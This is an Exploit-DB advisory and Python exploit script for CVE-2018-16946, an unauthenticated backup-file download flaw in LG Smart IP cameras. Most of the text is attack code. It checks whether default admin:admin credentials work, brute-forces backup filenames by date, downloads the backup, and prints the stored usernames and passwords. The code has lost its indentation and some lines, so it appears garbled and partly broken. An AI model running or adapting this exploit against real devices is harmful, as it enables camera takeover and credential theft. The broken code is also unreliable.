LG Smart IP Camera 1508190 – Backup File Download

  • 作者: Ege Balci
    日期: 2018-09-12
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/45394/
  • # Exploit Title: LG Smart IP Camera 1508190 - Backup File Download
    # Date: 2018-09-11
    # Exploit Author: Ege Balci
    # Vendor Homepage: https://www.lg.com
    # Software version: 1310250 <= 1508190
    # Model: LNB*/LND*/LNU*/LNV*
    # CVE: CVE-2018-16946
    # Description: smart network camera devices have broken access control. Attackers are able to 
    # download /updownload/t.report (aka Log & Report) files and download backup files (via download.php) 
    # without authenticating. These backup files contain user credentials and configuration information for 
    # the camera device. An attacker is able to discover the backup filename via reading the system logs or 
    # report data, or just by brute-forcing the backup filename pattern. It may be possible to authenticate 
    # to the admin account with the admin password.
    # lg_smart_ip.py
    import os
    import sys
    import sqlite3
    import tarfile
    import requests
    import datetime
    import threading
    if len(sys.argv) < 2:
    print("Usage:\n\t"+sys.argv[0]+" <TARGET-URL>")
    print("# Exploit Title: LG Smart IP Device Backup Download")
    print("# Date: 09-11-2018")
    print("# Exploit Author: Ege Balcı")
    print("# Vendor Homepage: https://www.lg.com")
    print("# Model: LNB*/LND*/LNU*/LNV*")
    print("# CVE: CVE-2018-16946")
    model_version_list = ["2219.0.0.1505220","2745.0.0.1508190","1954.0.0.1410150", "1030.0.0.1310250"] 
    # First try the default login creds...
    headers = {'Authorization': 'Basic YWRtaW46YWRtaW4='}
    default = requests.get(sys.argv[1]+"/httpapi?GetDeviceInformation", headers=headers)
    if "Model:" in default.text:
    print("[+] Default password works(admin:admin)")
    # exit(0)
    def brute(model_version):
    date = datetime.datetime.now()
    u = (['\\','|','/','-'])
    for i in range(0,3650): # No need to go back futher these cameras didn't existed 10 years ago 
    sys.stdout.write("\r[*] Bruteforing backup date...{0}".format(u[i%4]))
    log_date = date.strftime("%y")
    log_date += date.strftime("%m")
    log_date += date.strftime("%d")
    url = "/download.php?file="
    backup_name = "backup_"
    backup_name += log_date
    backup_name += "_"+model_version+".config"
    ContentLength = requests.head(sys.argv[1]+url+backup_name,stream=True).headers["Content-Length"]
    if ContentLength != "":
    backup = requests.get(sys.argv[1]+url+backup_name)
    print("\n[+] Backup file found !")
    print("[+] "+backup_name+" -> "+str(len(backup.content))+"\n")
    backup_file = open(backup_name+".tar.gz","wb")
    tar = tarfile.open(str(backup_name+".tar.gz"),mode="r:gz")
    for member in tar.getnames():
    # Print contents of every file
    print("[>] "+member)
    mem = open(member,"wb")
    conn = sqlite3.connect('mipsca.db')
    c = conn.cursor()
    users = c.execute("SELECT * FROM User")
    print("#=============== SUCCESS ===============#")
    for u in users:
    print("\n[#] Username: "+u[0])
    print("[#] Password: "+u[1])
    os.system("rm mipsca.db ConfigInfo.txt "+ backup_name+".tar.gz")
    date = (date-datetime.timedelta(days=1))
    report = requests.get(sys.argv[1]+"/updownload/t.report",verify=False)
    if report.status_code != 200:
    print("[-] Target device don't have report data :(")
    jobs = []
    for mv in model_version_list:
    t = threading.Thread(target=brute(mv))
    for j in jobs:
    model_id = (((report.text.split("= "))[1]).split("\n"))[0]
    print("[+] Model ID: "+model_id)
    version = (((report.text.split("= "))[2]).split("\n"))[0]
    print("[+] Version: "+version)